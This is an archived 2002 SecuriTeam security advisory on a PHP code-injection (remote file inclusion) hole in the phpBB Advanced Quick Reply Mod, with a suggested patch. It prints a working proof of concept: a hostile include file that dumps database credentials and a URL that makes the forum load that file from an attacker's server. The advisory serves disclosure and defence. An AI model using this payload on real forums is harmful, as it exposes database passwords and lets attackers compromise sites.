[UNIX] Code Injection in phpBB Advanced Quick Reply Mod

From: support@securiteam.com
Date: 11/17/02

Next message: support@securiteam.com: "[EXPL] i386 Linux Kernel DoS (Local)"

Previous message: support@securiteam.com: "[EXPL] vBulletin Calendar Improved Exploit Code"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Date: 17 Nov 2002 21:12:05 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -

Code Injection in phpBB Advanced Quick Reply Mod
------------------------------------------------------------------------

SUMMARY

Hai Nam Luke has found a security hole in the
<http://phpbbhacks.com/viewhack.php?id=586> phpBB Advanced Quick Reply Mod
(Code Injection). Attackers can exploit this Mod to inject PHP code into
an existing forum, effectively compromising the site's integrity.

DETAILS

Exploit:
In the file quick_reply.php you will notice the following vulnerable code:

if ( $mode == 'smilies' )
{
define('IN_PHPBB', true);
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
generate_smilies('window', PAGE_POSTING);
exit;
}

If you create a file called 'extension.inc' and include in it for example:
<?php
include('config'.'.php');
echo "DB Type: $dbms ";
echo "DB Host: $dbhost ";
echo "DB Name: $dbname ";
echo "DB User: $dbuser ";
echo "DB Pass: $dbpasswd ";
exit;
?>

Accessing the file by issuing the following URL:
http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your
Server]/&mode=smiles

Will return the server's database username and password.

Patch:
Modify in quick_reply.php the following:
[FIND]
if ( $mode == 'smilies' )
{</I<
[ADD BEFORE]
phpbb_root_path = "./";

ADDITIONAL INFORMATION

The information has been provided by <mailto:hainamluke@hotmail.com> Hai
Nam Luke.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: support@securiteam.com: "[EXPL] i386 Linux Kernel DoS (Local)"
Previous message: support@securiteam.com: "[EXPL] vBulletin Calendar Improved Exploit Code"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[UNIX] Adobe Acrobat Creates World Writable ~/AdobeFnt.lst Files
... Adobe Acrobat Creates World Writable ~/AdobeFnt.lst Files ... The following
security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web
site: http://www.securiteam.com ... #not properly secured, complain and exit ...
#we should have properly secure "$HOME/$kludgedir" at this point, ... (Securiteam)
Re: change passwords via LDAP
... It is part of a bigger program that we use to synchronize our LDAP to ... print
"Uid and/or password missing in input\n"; ... or print "Unable to connect to AD server\n",
exit 2; ... have identified as their top 5 IT Security Challenges. ... (NT-Bugtraq)
Re: The Mr. Dude School of Terrorist Delivery Systems
... *dopey* is the operative term for many security morons. ... I take the monorail
over to the main terminal there is a bar open until ... exit at the main terminal and walk
up to this ... Outside of my ringing cell phone, ... (alt.sports.football.pro.ne-patriots)
RE: How to "marry" subsystem and dynamic allocation
... If you require field level security for this production data you need to ...
DB2 provides the granular security and encryption you require. ... The exit would
look up the dataset in a table and if found, ... In batch we would implement a subsystem that
would intercept each ... (bit.listserv.ibm-main)
[UNIX] Daydream BBS Format String Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... product allows attackers to exploit
a format string vulnerability in the ... This bulletin is sent to members of the
SecuriTeam mailing list. ... In no event shall we be liable for any damages whatsoever
including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)